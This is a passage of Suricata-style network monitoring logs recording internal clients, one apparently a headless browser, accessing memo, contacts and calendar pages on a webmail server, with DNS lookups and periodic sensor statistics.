{"timestamp":"2020-02-29T00:14:54.541786+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":29738,"tx_id":2}} {"timestamp":"2020-02-29T00:14:55.960466+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":27259,"tx_id":0}} {"timestamp":"2020-02-29T00:14:55.970053+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37041,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:14:56.602528+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683}} {"timestamp":"2020-02-29T00:14:57.000627+0000","event_type":"stats","stats":{"uptime":14549,"capture":{"kernel_packets":135801,"kernel_drops":0},"decoder":{"pkts":135801,"bytes":93472586,"invalid":188,"ipv4":134294,"ipv6":8,"ethernet":135801,"raw":0,"null":0,"sll":0,"tcp":128948,"udp":5143,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765
,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":155319,"memcap":0}}} {"timestamp":"2020-02-29T00:15:01.606087+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:04.000225+0000","flow_id":218925971392270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":1974,"bytes_toclient":15190,"start":"2020-02-29T00:13:53.116494+0000","end":"2020-02-29T00:14:02.767022+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:15:04.000274+0000","event_type":"stats","stats":{"uptime":14556,"capture":{"kernel_packets":135832,"kernel_drops":0},"decoder":{"pkts":135834,"bytes":93495893,"invalid":188,"ipv4":134327,"ipv6":8,"ethernet":135834,"raw":0,"null":0,"sll":0,"tcp":128980,"udp":5144,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":2119,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:06.000144+0000","flow_id":1338237383344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:04.262384+0000","end":"2020-02-29T00:10:04.370921+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:08.716126+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9874,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:15:08.930159+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40775,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:09.000182+0000","flow_id":23809887247118,"event_type":"flow","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.203534+0000","end":"2020-02-29T00:10:07.311742+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:09.000397+0000","flow_id":691737431344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.034032+0000","end":"2020-02-29T00:10:07.142311+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.109992+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} {"timestamp":"2020-02-29T00:15:09.186121+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37474,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.486294+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990}} 
{"timestamp":"2020-02-29T00:15:12.000160+0000","event_type":"stats","stats":{"uptime":14564,"capture":{"kernel_packets":135848,"kernel_drops":0},"decoder":{"pkts":135873,"bytes":93512839,"invalid":188,"ipv4":134366,"ipv6":8,"ethernet":135873,"raw":0,"null":0,"sll":0,"tcp":129013,"udp":5150,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2786,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2802,"synack":2793,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1825,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2354,"failed_udp":112},"tx":{"http":4685,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2434}},"flow_mgr":{"closed_pruned":2766,"new_pruned":15,"est_pruned":2394,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":139580,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:12.002010+0000","flow_id":756720302109332,"event_type":"flow","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":7795,"start":"2020-02-29T00:14:05.864916+0000","end":"2020-02-29T00:14:11.316494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:12.596564+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37033,"tx_id":0}} {"timestamp":"2020-02-29T00:15:12.611502+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54842,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.267260+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:15:13.410859+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:13.425463+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56364,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.612765+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.624275+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51156,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.763662+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17701,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} 
{"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux 